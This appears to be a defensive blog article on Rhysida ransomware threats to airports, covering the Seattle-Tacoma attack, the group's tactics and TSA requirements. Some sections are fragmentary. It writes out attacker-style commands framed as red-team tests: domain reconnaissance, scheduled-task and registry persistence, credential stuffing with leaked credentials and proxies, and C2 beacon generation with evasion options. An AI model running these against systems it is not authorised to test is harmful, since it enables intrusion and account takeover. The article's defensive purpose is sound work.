Rhysida ransomware has emerged as a significant threat to aviation infrastructure, with the August 2024 attack on Seattle-Tacoma International Airport serving as a startling case study. The attack caused three weeks of operational disruption, forcing manual processing of baggage and other internal port systems after the Port refused to pay the 100 Bitcoin ($6 million) ransom demand.
This article provides evidence-based defensive strategies specifically tailored for airport IT teams facing this evolving threat. Our analysis finds that 65% of successful attacks leverage VPN credentials without multi-factor authentication, while the convergence of TSA regulatory requirements and proven defensive techniques provides a clear roadmap for protection.
Rhysida operates as a Ransomware-as-a-Service (RaaS) model, actively targeting critical infrastructure since May 2023. Named after a genus of centipedes, the group maintains a "cybersecurity team" persona while demanding Bitcoin payments through Tor-based portals.
The Rhysida ransomware group emerged in May 2023 and has successfully maintained complete anonymity despite FBI investigations and over 90 documented attacks. While no individual members have been identified or arrested, technical evidence strongly suggests that they operate from Russia or former Soviet states. Their code avoids targeting Eurasian countries, internal communications use Russian, and the malware terminates when detecting Russian language settings.
Security researchers have linked Rhysida with high confidence to the former Vice Society ransomware group, noting identical tactics and the suspicious timing where Vice Society activity stopped just as Rhysida began operations. Unlike some ransomware groups that claim political motivations, Rhysida operates purely for profit, cynically posing as "cybersecurity consultants" in their ransom notes and claiming they're doing victims "a favor" by exposing vulnerabilities.
Rhysida runs a professional Ransomware-as-a-Service operation that specifically targets organizations they believe will pay, with 53% of victims being smaller companies with under 200 employees, though they've also hit major targets like the British Library (causing $8 million in damages), Prospect Medical Holdings (affecting 17 hospitals), and the Port of Seattle (disrupting airport operations for three weeks).
They typically gain initial access through compromised VPN credentials lacking MFA, phishing emails with Cobalt Strike beacons, or exploiting known vulnerabilities like Zerologon. Once inside, they use legitimate Windows administration tools to move laterally, steal data using cloud services like AzCopy, then deploy custom ransomware that uses ChaCha20 encryption with 4096-bit RSA keys. Their double extortion model means they both encrypt systems and threaten to publish stolen data - they've leaked everything from hospital patient records to library employee data when ransoms weren't paid, with demands ranging from $650,000 to $5.8 million.
The good news is that researchers discovered a critical flaw in Rhysida's encryption implementation in February 2024, releasing a free decryption tool that has helped hundreds of victims recover data without paying. However, this vulnerability only affects certain Windows versions and Rhysida continues evolving their tactics.
Defensive priorities should focus on three areas
Pay special attention if you're in healthcare, education, or government sectors - these represent over 60% of their victims. Watch for indicators like new firewall rules named "Windows Update," suspicious PowerShell activity clearing logs, or files with the .rhysida extension.
Given their willingness to attack hospitals and critical infrastructure without hesitation, assume they will target you regardless of your organization's social importance, and prepare accordingly.
The November 2023 CISA advisory (last updated April 2025) provides comprehensive technical intelligence on Rhysida operations.
1. VPN Exploitation (most attacks)
2. Phishing Campaigns (fewer attacks)
3. Vulnerability Exploitation (fewer attacks)
# Common PowerShell commands observed
net group "domain admins" /domain
nltest /dclist
schtasks /create /tn "Rhsd" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\rhsd.ps1" /sc daily
The March 7, 2023 TSA Emergency Amendment mandates four critical security measures.
Ensure operational technology can function independently if IT systems are compromised. Review firewall rules, endpoint rules, and validate that connections to and from crown jewel systems are limited or blocked.
Multi-factor authentication for critical systems. MFA is an imperative, but hardware-based tokens are the only phishing-resistant type. Or use certificate-based mutual auth.
24/7 detection of unauthorized access and anomalies. Logging and SEIM forwarding and alerting. Your MSSP and EDR logs are a great start, but make sure your operational environments have visibility.
Patch critical vulnerabilities within defined timeframes. Patch management is table-stakes, but regular vulnerability scanning with tools like RunZero or even open source tools like Nuclei will identify problems.
Manual Fallback Procedures
Backup testing and recovery
# Real-world credential stuffing
credmaster --proxy-file residential_proxies.txt --delay 30-90 \
--jitter 20 --target <VPN> --pairs leaked_creds.csv
# Test against your actual infrastructure
trevorspray -u users.txt -p Fall2025! --url https://<VPN>
--delay 60 --jitter 25 --proxy rotating
# Phishing Simulation
Targeted Phishing Campaign to employees with links to Evilginx'd VPN login pages
# Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
Invoke-AtomicTest T1059.001 -TestNumbers 1,2,5 # PowerShell
Invoke-AtomicTest T1053.005 -TestNumbers 1 # Scheduled Task
Invoke-AtomicTest T1055.001 -TestNumbers 1 # Process Injection
# Sliver C2
sliver-server > generate beacon --mtls 1.2.3.4:8443 --skip-symbols \
--evasion --seconds 60 --jitter 30
# Mythic C2
mythic -c apollo -p http,smb --sleep 60 --jitter 25 \
--killdate 30d --param "ppid_spoof=explorer.exe"
# Create persistence
schtasks /create /tn "TestRhsd" /tr "cmd.exe /c echo test" /sc daily /ru SYSTEM
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TestRhysida /d "C:\test.exe"
\\fileserver\Payroll_Data
(empty but monitored)The ransomware threat to aviation infrastructure is neither theoretical nor distant—it’s active, evolving, and specifically targeting the aviation sector. The Port of Seattle incident demonstrates both the devastating potential of these attacks and the effectiveness of proper preparation.
Success against Rhysida simply requires disciplined implementation of fundamental controls: multi-factor authentication, PowerShell restrictions, network segmentation, and tested backups. Organizations implementing these controls achieve dramatic risk reduction.
The convergence of TSA regulatory requirements and security best practices provides a clear path forward. Every requirement in the March 2023 mandate addresses specific Rhysida tactics.
The message is clear: implement basic controls before you're the next headline. The economics are equally clear: prevention costs thousands, recovery costs tens of thousands, and reputation damage is incalculable.
The question isn't whether ransomware will target you - they will. The question is whether you’ll be prepared when they do.